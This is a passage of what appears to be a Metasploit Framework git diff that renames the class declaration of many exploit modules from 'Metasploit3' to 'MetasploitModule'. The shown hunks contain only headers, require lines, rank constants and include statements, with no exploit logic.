445567be76..4bdb568455 100644 --- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb index dcb5f9346a..c3145edd6a 100644 --- a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb +++ b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb index 1a6ef9ca70..4a3fc784c6 100644 --- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb +++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb index bb4886ba44..78d47028e5 100644 --- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb index f79bc97fd5..3fefc1f43a 100644 --- a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb index 68a671f847..9e3a04a118 100644 --- a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb +++ b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb index 8c833f900e..c5f779aac6 100644 --- a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb +++ b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb index b040cd0391..385b64db3e 100644 --- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index 55f244cdda..a3c709311a 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb index 7cf0100b51..0cae78da7e 100644 --- a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb +++ b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index 253f4b1b31..a8697b93ed 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_proxy_prototype.rb b/modules/exploits/multi/browser/firefox_proxy_prototype.rb index 8da445326f..ff0aa8649d 100644 --- a/modules/exploits/multi/browser/firefox_proxy_prototype.rb +++ b/modules/exploits/multi/browser/firefox_proxy_prototype.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index 4511da4250..a78533c60a 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/firefox_svg_plugin.rb b/modules/exploits/multi/browser/firefox_svg_plugin.rb index 6bfa1dc147..568c9ed1de 100644 --- a/modules/exploits/multi/browser/firefox_svg_plugin.rb +++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb index ad5eda286d..cee613df0d 100644 --- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb +++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_webidl_injection.rb b/modules/exploits/multi/browser/firefox_webidl_injection.rb index 194c1920ba..75d0e62887 100644 --- a/modules/exploits/multi/browser/firefox_webidl_injection.rb +++ b/modules/exploits/multi/browser/firefox_webidl_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb index f76342cdbf..5bef4ac4e8 100644 --- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb +++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index 9fe7bb5ea4..9faaab409d 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb index aedfed2fd1..2efbc2544a 100644 --- a/modules/exploits/multi/browser/java_atomicreferencearray.rb +++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_calendar_deserialize.rb b/modules/exploits/multi/browser/java_calendar_deserialize.rb index 3942291ee4..7d91e8b864 100644 --- a/modules/exploits/multi/browser/java_calendar_deserialize.rb +++ b/modules/exploits/multi/browser/java_calendar_deserialize.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index 3a123768f2..5f9427aae4 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/multi/browser/java_jre17_driver_manager.rb b/modules/exploits/multi/browser/java_jre17_driver_manager.rb index b832f9ea9b..8c68bb3eeb 100644 --- a/modules/exploits/multi/browser/java_jre17_driver_manager.rb +++ b/modules/exploits/multi/browser/java_jre17_driver_manager.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_exec.rb b/modules/exploits/multi/browser/java_jre17_exec.rb index 9280d870ad..b3a797e075 100644 --- a/modules/exploits/multi/browser/java_jre17_exec.rb +++ b/modules/exploits/multi/browser/java_jre17_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb index 7c37c553a2..e0545f2e52 100644 --- a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb +++ b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jaxws.rb b/modules/exploits/multi/browser/java_jre17_jaxws.rb index 4dfad212b6..5333aced38 100644 --- a/modules/exploits/multi/browser/java_jre17_jaxws.rb +++ b/modules/exploits/multi/browser/java_jre17_jaxws.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean.rb b/modules/exploits/multi/browser/java_jre17_jmxbean.rb index 597c3fdf2f..ce12144e5f 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index 906d07867f..1902a0eb83 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb index 32f55c5613..1bbea0f9c8 100644 --- a/modules/exploits/multi/browser/java_jre17_method_handle.rb +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb index 9e4931f342..32da73a192 100644 --- a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb +++ b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb index 9fa97d5e57..b3852a2629 100644 --- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb +++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_rhino.rb b/modules/exploits/multi/browser/java_rhino.rb index c752549994..5577bb5818 100644 --- a/modules/exploits/multi/browser/java_rhino.rb +++ b/modules/exploits/multi/browser/java_rhino.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_rmi_connection_impl.rb b/modules/exploits/multi/browser/java_rmi_connection_impl.rb index 41a3705785..5ae6062ed0 100644 --- a/modules/exploits/multi/browser/java_rmi_connection_impl.rb +++ b/modules/exploits/multi/browser/java_rmi_connection_impl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index 46be8c7c58..290c212685 100644 --- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 82bc228e50..5ebe7bd273 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_storeimagearray.rb b/modules/exploits/multi/browser/java_storeimagearray.rb index cab28b512a..68fb323109 100644 --- a/modules/exploits/multi/browser/java_storeimagearray.rb +++ b/modules/exploits/multi/browser/java_storeimagearray.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_trusted_chain.rb b/modules/exploits/multi/browser/java_trusted_chain.rb index e2f4651f3e..fb54d99100 100644 --- a/modules/exploits/multi/browser/java_trusted_chain.rb +++ b/modules/exploits/multi/browser/java_trusted_chain.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_verifier_field_access.rb b/modules/exploits/multi/browser/java_verifier_field_access.rb index dbe08a3035..644ecbf818 100644 --- a/modules/exploits/multi/browser/java_verifier_field_access.rb +++ b/modules/exploits/multi/browser/java_verifier_field_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index b01bba4436..a0781321ae 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/mozilla_navigatorjava.rb b/modules/exploits/multi/browser/mozilla_navigatorjava.rb index bf763ea14d..e2b148f5c9 100644 --- a/modules/exploits/multi/browser/mozilla_navigatorjava.rb +++ b/modules/exploits/multi/browser/mozilla_navigatorjava.rb @@ -6,7 +6,7 @@ require 'msf/core/constants' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/opera_configoverwrite.rb b/modules/exploits/multi/browser/opera_configoverwrite.rb index 0e426d005b..74045adbdd 100644 --- a/modules/exploits/multi/browser/opera_configoverwrite.rb +++ b/modules/exploits/multi/browser/opera_configoverwrite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb index 470e2f1eb5..e04ac98519 100644 --- a/modules/exploits/multi/browser/opera_historysearch.rb +++ b/modules/exploits/multi/browser/opera_historysearch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/qtjava_pointer.rb b/modules/exploits/multi/browser/qtjava_pointer.rb index 5a1e3c5e1b..e23c60c516 100644 --- a/modules/exploits/multi/browser/qtjava_pointer.rb +++ b/modules/exploits/multi/browser/qtjava_pointer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index 685a0ae6d7..726953c360 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/elasticsearch/search_groovy_script.rb b/modules/exploits/multi/elasticsearch/search_groovy_script.rb index ee65df2cc2..68a45dd24f 100644 --- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb +++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb index fc668215fb..2aa31da111 100644 --- a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb +++ b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb index 1e15976eb4..13f70050be 100644 --- a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb +++ b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/maple_maplet.rb b/modules/exploits/multi/fileformat/maple_maplet.rb index 96e8152bf5..bc14a88c60 100644 --- a/modules/exploits/multi/fileformat/maple_maplet.rb +++ b/modules/exploits/multi/fileformat/maple_maplet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb b/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb index 3b72a6101e..920ca81f2c 100644 --- a/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb +++ b/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/peazip_command_injection.rb b/modules/exploits/multi/fileformat/peazip_command_injection.rb index 8fe12bb9d3..7c92f18163 100644 --- a/modules/exploits/multi/fileformat/peazip_command_injection.rb +++ b/modules/exploits/multi/fileformat/peazip_command_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb index 171b689dbb..baf8345adb 100644 --- a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb +++ b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb index 3a910ece59..a9d22c9429 100644 --- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb +++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/multi/gdb/gdb_server_exec.rb b/modules/exploits/multi/gdb/gdb_server_exec.rb index 9d501c7793..9f4f0f63a4 100644 --- a/modules/exploits/multi/gdb/gdb_server_exec.rb +++ b/modules/exploits/multi/gdb/gdb_server_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Gdb diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index 47840b548e..5054756e07 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/multi/http/activecollab_chat.rb b/modules/exploits/multi/http/activecollab_chat.rb index d8f6182078..c7e6129b76 100644 --- a/modules/exploits/multi/http/activecollab_chat.rb +++ b/modules/exploits/multi/http/activecollab_chat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index 5899e09be6..bc94a338b3 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb index d5bd15e7ba..9be7e7fffd 100644 --- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb +++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/apache_roller_ognl_injection.rb b/modules/exploits/multi/http/apache_roller_ognl_injection.rb index 7c34f04663..2309d57824 100644 --- a/modules/exploits/multi/http/apache_roller_ognl_injection.rb +++ b/modules/exploits/multi/http/apache_roller_ognl_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/apprain_upload_exec.rb b/modules/exploits/multi/http/apprain_upload_exec.rb index a7a8dbd4f9..0ca04d25f8 100644 --- a/modules/exploits/multi/http/apprain_upload_exec.rb +++ b/modules/exploits/multi/http/apprain_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index fb6be15379..fdf8efc7cf 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index 645a337f93..392ffc6c62 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index ca192f495c..762484a328 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 